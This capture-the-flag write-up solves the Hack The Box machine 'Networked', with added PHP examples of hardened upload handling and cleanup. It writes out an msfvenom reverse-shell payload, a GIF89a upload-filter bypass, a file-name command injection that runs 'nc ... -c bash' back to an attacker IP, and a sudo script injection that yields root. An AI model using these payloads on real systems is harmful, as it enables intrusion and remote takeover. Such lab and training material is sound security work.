
Hello fellow hackers, today we are going to solve Networked from Hack The Box.
It’s a great easy box to solve!!! So let’s get started…
I started with nmap to scan the open ports on the machine
nmap -A -v -sT 10.10.10.146

The box has two ports open:
- Port 22 running an SSH service
- Port 80 running an HTTP server
I checked whether the services are vulnerable to any public exploits and found nothing; the services are up to date.
Now let’s check the web server
After going to the web server I found a message from the admin asking us to fund his project and inviting us to his pool party, sounds cool!!!
I started to enumerate the directories using gobuster
gobuster dir -u http://10.10.10.146 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

Right away it popped out a directory called backup. Sounds interesting? Let’s check it out.

Inside it I found a .tar file called backup.tar; after checking it out I found it is a backup of the pages’ source code.
Going through the pages I found an upload utility under upload.php that only accepts images. Going through the PHP code of the page that we have, it filters the uploaded photos using a whitelist filter on the file extension.
So in order to bypass it I generated a PHP payload using msfvenom and saved it with a double extension:
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.14.92 LPORT=1995 -f raw > shell.php.jpeg
Then I uploaded it to the server but got rejected again.
So it is also checking the file content somehow; in order to bypass that I added the GIF image header GIF89a; at the beginning of the payload file to fool the check.
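Both bypasses above work because the check looks at the file name and at the first few bytes only. As an added example (not the box’s upload.php and not code from the box author), here is an upload handler that makes its decision on the decoded image content instead: the MIME type is sniffed as a first filter, the file is fully decoded with GD, and only a re-encoded copy is written under a server-chosen name. The function name validate_and_store_image and the $uploadDir argument are assumptions for the example.

```php
<?php
// Added example, not the box's upload.php: a stricter image upload handler.
// Hypothetical names: validate_and_store_image(), $uploadDir (assumed to be a
// directory from which the web server will not execute PHP).
declare(strict_types=1);

const MAX_UPLOAD_BYTES = 2 * 1024 * 1024;

// Accepted MIME types (as detected from content) mapped to the extension we will write.
const ACCEPTED_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Returns the stored file name on success, or throws on any failure.
 * The decision is made on the decoded content, never on the client's file name,
 * so "shell.php.jpeg" versus "shell.jpeg" makes no difference here.
 */
function validate_and_store_image(string $tmpPath, string $uploadDir): string
{
    if (!is_uploaded_file($tmpPath)) {
        throw new RuntimeException('not a file uploaded via HTTP POST');
    }
    $size = filesize($tmpPath);
    if ($size === false || $size === 0 || $size > MAX_UPLOAD_BYTES) {
        throw new RuntimeException('unacceptable size');
    }

    // 1. Content sniffing with libmagic. A file starting with "GIF89a;" followed by
    //    PHP code still reports image/gif here, so this is only a coarse first filter.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($tmpPath);
    if (!is_string($mime) || !isset(ACCEPTED_TYPES[$mime])) {
        throw new RuntimeException('rejected type');
    }

    // 2. Fully decode the image. A magic header followed by non-image bytes is not a
    //    decodable image, so this is the step that actually stops the "GIF89a;" trick.
    $raw = file_get_contents($tmpPath);
    $img = @imagecreatefromstring($raw);
    if ($img === false) {
        throw new RuntimeException('content is not a decodable image');
    }

    // 3. Re-encode from the decoded pixels under a server-chosen random name.
    //    Anything in the original bytes that was not pixel data is discarded.
    $ext  = ACCEPTED_TYPES[$mime];
    $name = bin2hex(random_bytes(16)) . '.' . $ext;
    $dest = rtrim($uploadDir, '/') . '/' . $name;
    $ok = match ($ext) {
        'jpg' => imagejpeg($img, $dest, 90),
        'png' => imagepng($img, $dest),
        'gif' => imagegif($img, $dest),
    };
    imagedestroy($img);
    if (!$ok) {
        throw new RuntimeException('could not write re-encoded image');
    }
    return $name;
}

// Request handling, e.g.:
// try {
//     $stored = validate_and_store_image($_FILES['myFile']['tmp_name'], '/var/www/uploads');
//     echo "file uploaded, refresh the gallery\n";
// } catch (RuntimeException $e) {
//     http_response_code(400);
//     echo 'upload rejected';   // keep $e->getMessage() in the server log, not the response
// }
```

The re-encode step is the one that matters: even if a decoder were tricked into accepting a crafted file, only the decoded pixels are written, never the attacker’s original bytes. Serving the upload directory with PHP execution disabled (or from outside the web root) is the second, independent layer.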

Then I uploaded it and it passed!!!
It gave a message saying that the file is uploaded and to refresh the gallery.
The gallery is under /photos.php.
I fired up my listener, went to /photos.php and refreshed it, and we got a shell!!!

We are in as the apache user. Going to the home directory I found a directory for user guly; I couldn’t read the user flag, but I was able to read the check_attack.php file
and the crontab.guly file.
The check_attack.php file checks whether any file in the upload directory contains an IP address in its name; if so, it writes the name to log_path and then deletes the file using the rm command.
The script is set up as a cron job to run every 3 minutes.
So let’s exploit it!!!!
Going to the upload directory, I created a file using the touch command as follows:
touch '; nc 10.10.14.92 1995 -c bash'
So what happens here is that when the script runs and finds an IP address in my file name, it sends the name to the log path and then runs the rm command, so the semicolon injects the nc command and executes it!!!
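The root cause here is that a file name taken from a directory listing ends up inside a shell command line. As an added example (not the box’s check_attack.php, whose exact code is not shown on this page), here is a cleanup job with the same purpose that never hands the name to a shell: names are validated against a strict pattern, the IP match is done with a regex, and deletion uses unlink() on a path built from the validated base name. The function names, UPLOAD_DIR and LOG_PATH are assumptions for the example.

```php
<?php
// Added example, not the box's check_attack.php: log and remove upload-directory files
// whose names contain an IPv4 address, without ever invoking a shell.
// Assumed values: UPLOAD_DIR, LOG_PATH; hypothetical helpers below.
declare(strict_types=1);

const UPLOAD_DIR = '/var/www/html/uploads';   // assumed path
const LOG_PATH   = '/tmp/attack.log';          // assumed path

// Does the base name contain an IPv4-looking token?
function name_contains_ipv4(string $name): bool
{
    return preg_match('/\b(?:\d{1,3}\.){3}\d{1,3}\b/', $name) === 1;
}

// Accept only base names we would ever expect in the upload directory.
// Shell metacharacters, spaces, leading dashes and path separators are all rejected,
// so a name such as "; nc 10.10.14.92 1995 -c bash" never reaches the deletion step.
function is_safe_basename(string $name): bool
{
    return $name !== ''
        && $name === basename($name)
        && preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,254}$/', $name) === 1;
}

/**
 * Sweep one directory. Returns ['removed' => [...], 'skipped' => [...]].
 * There is no exec()/system() call anywhere, so there is nothing to inject into.
 */
function sweep_uploads(string $dir, string $logPath): array
{
    $removed = [];
    $skipped = [];
    foreach (scandir($dir) ?: [] as $name) {
        if ($name === '.' || $name === '..') {
            continue;
        }
        if (!is_safe_basename($name)) {
            // Leave it alone, but record it: an odd name is itself worth alerting on.
            // The name is hex-encoded so the log line cannot carry control characters.
            file_put_contents(
                $logPath,
                date('c') . ' suspicious name (not removed, hex): ' . bin2hex($name) . "\n",
                FILE_APPEND
            );
            $skipped[] = $name;
            continue;
        }
        if (!name_contains_ipv4($name)) {
            continue;
        }
        $path = $dir . '/' . $name;
        file_put_contents($logPath, date('c') . " removing $path\n", FILE_APPEND);
        if (is_file($path) && unlink($path)) {
            $removed[] = $name;
        }
    }
    return ['removed' => $removed, 'skipped' => $skipped];
}

// Cron usage (every 3 minutes, as on the box): */3 * * * * /usr/bin/php /path/to/sweep.php
sweep_uploads(UPLOAD_DIR, LOG_PATH);
```

If a shell really is required (for example to call an external tool), the same rule applies: build the argument list with escapeshellarg() and keep the strict name validation, because escaping alone does not stop a name like "-rf" from being read as an option.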

I set up my listener and waited for the script to run; after 3 minutes we have a shell as user guly!!!!

Now to the root access.
After some basic enumeration,
I ran the sudo -l command.
User guly is allowed to run the changename.sh script with sudo and no password.
After running the script several times, I tried to inject a command at every line of the script as follows \ /bin/bash and we popped a root shell!!!

SMT Red Team